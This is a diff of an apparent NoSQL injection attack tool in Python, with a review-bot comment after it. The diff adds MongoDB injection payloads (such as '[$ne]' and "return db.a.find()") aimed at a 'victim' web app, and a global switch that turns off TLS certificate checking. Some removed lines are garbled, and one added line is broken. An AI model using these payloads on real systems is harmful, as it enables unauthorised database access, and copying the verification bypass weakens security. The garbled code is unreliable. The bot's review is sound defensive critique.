1- import httplib2
21import urllib
32import urllib2
4- import json
3+ import string
4+ import nsmmongo
5+ from sys import version_info
56import datetime
6- import itertools
7- import re
7+ import time
8+ import random
89
9- def getApps (victim ,webPort ,uri ,https ,verb ):
10+ def httpRequestor (httpReq ):
11+ #Need to determine version of Python that's running to figure out how to handle self-signed certs.
12+ if version_info () >= (2 ,7 ,9 ):
13+ import ssl
14+ ssl ._create_default_https_context = ssl ._create_unverified_context
15+
16+
17+
18+
19+
20+
21+ def getApps (webPort ,victim ,uri ,https ,verb ,requestHeaders ):
1022 print "Web App Attacks (GET)"
1123 print "==============="
1224 paramName = []
1325 global testNum
26+ global httpMethod
27+ httpMethod = "GET"
1428 testNum = 1
1529 paramValue = []
1630 global vulnAddrs
@@ -19,6 +33,8 @@ def getApps(victim,webPort,uri,https,verb):
1933 possAddrs = []
2034 timeVulnsStr = []
2135 timeVulnsInt = []
36+ yes_tag = ['y' , 'Y' ]
37+ no_tag = ['n' , 'N' ]
2238 appUp = False
2339 strTbAttack = False
2440 intTbAttack = False
@@ -30,7 +46,6 @@ def getApps(victim,webPort,uri,https,verb):
3046 str24 = False
3147 global int24
3248 int24 = False
33- global requestHeaders
3449
3550 #Verify app is working.
3651 print "Checking to see if site at " + str (victim ) + ":" + str (webPort ) + str (uri ) + " is up..."
@@ -107,7 +122,7 @@ def getApps(victim,webPort,uri,https,verb):
107122
108123 if errorCheck == False :
109124 injLen = int (len (urllib2 .urlopen (req ).read ()))
110- checkResult (randLength ,injLen ,testNum )
125+ checkResult (randLength ,injLen ,testNum , verb )
111126 testNum += 1
112127 else :
113128 testNum += 1
@@ -125,7 +140,7 @@ def getApps(victim,webPort,uri,https,verb):
125140
126141 if errorCheck == False :
127142 injLen = int (len (urllib2 .urlopen (req ).read ()))
128- checkResult (randLength ,injLen ,testNum )
143+ checkResult (randLength ,injLen ,testNum , verb )
129144 testNum += 1
130145
131146 else :
@@ -144,7 +159,7 @@ def getApps(victim,webPort,uri,https,verb):
144159
145160 if errorCheck == False :
146161 injLen = int (len (urllib2 .urlopen (req ).read ()))
147- checkResult (randLength ,injLen ,testNum )
162+ checkResult (randLength ,injLen ,testNum , verb )
148163 testNum += 1
149164
150165 else :
@@ -163,7 +178,7 @@ def getApps(victim,webPort,uri,https,verb):
163178
164179 if errorCheck == False :
165180 injLen = int (len (urllib2 .urlopen (req ).read ()))
166- checkResult (randLength ,injLen ,testNum )
181+ checkResult (randLength ,injLen ,testNum , verb )
167182 testNum += 1
168183 else :
169184 testNum += 1
@@ -180,7 +195,7 @@ def getApps(victim,webPort,uri,https,verb):
180195
181196 if errorCheck == False :
182197 injLen = int (len (urllib2 .urlopen (req ).read ()))
183- checkResult (randLength ,injLen ,testNum )
198+ checkResult (randLength ,injLen ,testNum , verb )
184199 testNum += 1
185200
186201 else :
@@ -198,7 +213,7 @@ def getApps(victim,webPort,uri,https,verb):
198213
199214 if errorCheck == False :
200215 injLen = int (len (urllib2 .urlopen (req ).read ()))
201- checkResult (randLength ,injLen ,testNum )
216+ checkResult (randLength ,injLen ,testNum , verb )
202217 testNum += 1
203218 else :
204219 testNum += 1
@@ -215,7 +230,7 @@ def getApps(victim,webPort,uri,https,verb):
215230
216231 if errorCheck == False :
217232 injLen = int (len (urllib2 .urlopen (req ).read ()))
218- checkResult (randLength ,injLen ,testNum )
233+ checkResult (randLength ,injLen ,testNum , verb )
219234 testNum += 1
220235 else :
221236 testNum += 1
@@ -233,18 +248,19 @@ def getApps(victim,webPort,uri,https,verb):
233248
234249 if errorCheck == False :
235250 injLen = int (len (urllib2 .urlopen (req ).read ()))
236- checkResult (randLength ,injLen ,testNum )
251+ checkResult (randLength ,injLen ,testNum , verb )
237252 testNum += 1
238253
254+
239255 doTimeAttack = raw_input ("Start timing based tests (y/n)? " )
240256
241257 if doTimeAttack in yes_tag :
242258 print "Starting Javascript string escape time based injection..."
243259 req = urllib2 .Request (uriArray [18 ], None , requestHeaders )
244- start = 4 : 05 PM .time ()
260+ start = time .time ()
245261 strTimeInj = urllib2 .urlopen (req )
246262 page = strTimeInj .read ()
247- end = 4 : 05 PM .time ()
263+ end = time .time ()
248264 strTimeInj .close ()
249265 #print str(end)
250266 #print str(start)
@@ -331,12 +347,14 @@ def getApps(victim,webPort,uri,https,verb):
331347 raw_input ("Press enter to continue..." )
332348 return ()
333349
334- def postApps ():
350+ def postApps (victim , webPort , uri , https , verb , postData , requestHeaders ):
335351 print "Web App Attacks (POST)"
336352 print "==============="
337353 paramName = []
338354 paramValue = []
339355 global vulnAddrs
356+ global httpMethod
357+ httpMethod = "POST"
340358 vulnAddrs = []
341359 global possAddrs
342360 possAddrs = []
@@ -347,10 +365,8 @@ def postApps():
347365 intTbAttack = False
348366 trueStr = False
349367 trueInt = False
350- global postData
351368 global neDict
352369 global gtDict
353- global requestHeaders
354370 testNum = 1
355371
356372 #Verify app is working.
@@ -447,7 +463,7 @@ def postApps():
447463
448464 if errorCheck == False :
449465 injLen = int (len (urllib2 .urlopen (req ).read ()))
450- checkResult (randLength ,injLen ,testNum )
466+ checkResult (randLength ,injLen ,testNum , verb )
451467 testNum += 1
452468
453469 else :
@@ -474,7 +490,7 @@ def postApps():
474490
475491 if errorCheck == False :
476492 injLen = int (len (urllib2 .urlopen (req ).read ()))
477- checkResult (randLength ,injLen ,testNum )
493+ checkResult (randLength ,injLen ,testNum , verb )
478494 testNum += 1
479495
480496 postData .update ({injOpt :"a'; return db.a.find(); var dummy='!" })
@@ -491,7 +507,7 @@ def postApps():
491507
492508 if errorCheck == False :
493509 injLen = int (len (urllib2 .urlopen (req ).read ()))
494- checkResult (randLength ,injLen ,testNum )
510+ checkResult (randLength ,injLen ,testNum , verb )
495511 testNum += 1
496512 else :
497513 testNum += 1
@@ -511,7 +527,7 @@ def postApps():
511527
512528 if errorCheck == False :
513529 injLen = int (len (urllib2 .urlopen (req ).read ()))
514- checkResult (randLength ,injLen ,testNum )
530+ checkResult (randLength ,injLen ,testNum , verb )
515531 testNum += 1
516532 else :
517533 testNum += 1
@@ -532,7 +548,7 @@ def postApps():
532548
533549 if errorCheck == False :
534550 injLen = int (len (urllib2 .urlopen (req ).read ()))
535- checkResult (randLength ,injLen ,testNum )
551+ checkResult (randLength ,injLen ,testNum , verb )
536552 testNum += 1
537553
538554 else :
@@ -553,7 +569,7 @@ def postApps():
553569
554570 if errorCheck == False :
555571 injLen = int (len (urllib2 .urlopen (req ).read ()))
556- checkResult (randLength ,injLen ,testNum )
572+ checkResult (randLength ,injLen ,testNum , verb )
557573 testNum += 1
558574
559575 else :
@@ -575,7 +591,7 @@ def postApps():
575591
576592 if errorCheck == False :
577593 injLen = int (len (urllib2 .urlopen (req ).read ()))
578- checkResult (randLength ,injLen ,testNum )
594+ checkResult (randLength ,injLen ,testNum , verb )
579595 testNum += 1
580596 print "\n "
581597 else :
@@ -595,7 +611,7 @@ def postApps():
595611
596612 if errorCheck == False :
597613 injLen = int (len (urllib2 .urlopen (req ).read ()))
598- checkResult (randLength ,injLen ,testNum )
614+ checkResult (randLength ,injLen ,testNum , verb )
599615 testNum += 1
600616
601617 else :
@@ -724,7 +740,7 @@ def errorTest (errorCheck,testNum):
724740
725741
726742
727- def checkResult (baseSize ,respSize ,testNum ):
743+ def checkResult (baseSize ,respSize ,testNum , verb ):
728744 global vulnAddrs
729745 global possAddrs
730746 global lt24
@@ -834,7 +850,7 @@ def buildUri(origUri, randValue):
834850 paramValue = []
835851 global uriArray
836852 uriArray = ["" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ,"" ]
837- injOpt = ""
853+ injOpt = []
838854
839855 #Split the string between the path and parameters, and then split each parameter
840856 try :
@@ -857,11 +873,17 @@ def buildUri(origUri, randValue):
857873 menuItem += 1
858874
859875 try :
860- injIndex = raw_input ("Which parameter should we inject? " )
861- injOpt = str (paramName [int (injIndex )- 1 ])
862- print "Injecting the " + injOpt + " parameter..."
876+ injIndex = raw_input ("Enter parameters to inject in a comma separated list: " )
863877
864- except :
878+ for params in injIndex .split ("," ):
879+ injOpt .append (paramName [int (params )- 1 ])
880+
881+ #injOpt = str(paramName[int(injIndex)-1])
882+
883+ for params in injOpt :
884+ print "Injecting the " + params + " parameter..."
885+
886+ except Exception :
865887 raw_input ("Something went wrong. Press enter to return to the main menu..." )
866888 return
867889
@@ -887,7 +909,8 @@ def buildUri(origUri, randValue):
887909 uriArray [18 ] = split_uri [0 ] + "?"
888910
889911 for item in paramName :
890- if paramName [x ] == injOpt :
912+
913+ if paramName [x ] in injOpt :
891914 uriArray [0 ] += paramName [x ] + "=" + randValue + "&"
892915 uriArray [1 ] += paramName [x ] + "[$ne]=" + randValue + "&"
893916 uriArray [2 ] += paramName [x ] + "=a'; return db.a.find(); var dummy='!" + "&"
@@ -933,14 +956,15 @@ def buildUri(origUri, randValue):
933956
934957 #Clip the extra & off the end of the URL
935958 x = 0
936- while x <= 17 :
959+ while x <= 18 :
937960 uriArray [x ]= uriArray [x ][:- 1 ]
938961 x += 1
939962
940963 return uriArray [0 ]
941964
942965def getDBInfo ():
943966 curLen = 0
967+ yes_tag = ['y' , 'Y' ]
944968 nameLen = 0
945969 gotFullDb = False
946970 gotNameLen = False
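Review bot: In the new `httpRequestor`, `version_info ()` calls `sys.version_info`, which is a tuple-like value and not callable, so the function raises TypeError as soon as it runs; the test should read `if version_info >= (2, 7, 9):`. Once that is fixed, `ssl._create_default_https_context = ssl._create_unverified_context` switches off certificate verification for every HTTPS connection the process opens afterwards, not only those to a self-signed target, and it relies on private `ssl` names. Scoping it to the calls that need it, for example `urllib2.urlopen(req, context=ctx)` with an unverified context built only when the operator asks for it, would leave the rest of the tool's traffic verified. As shown, the function also never uses its `httpReq` argument and returns nothing, so it looks unfinished; a short comment saying so would help.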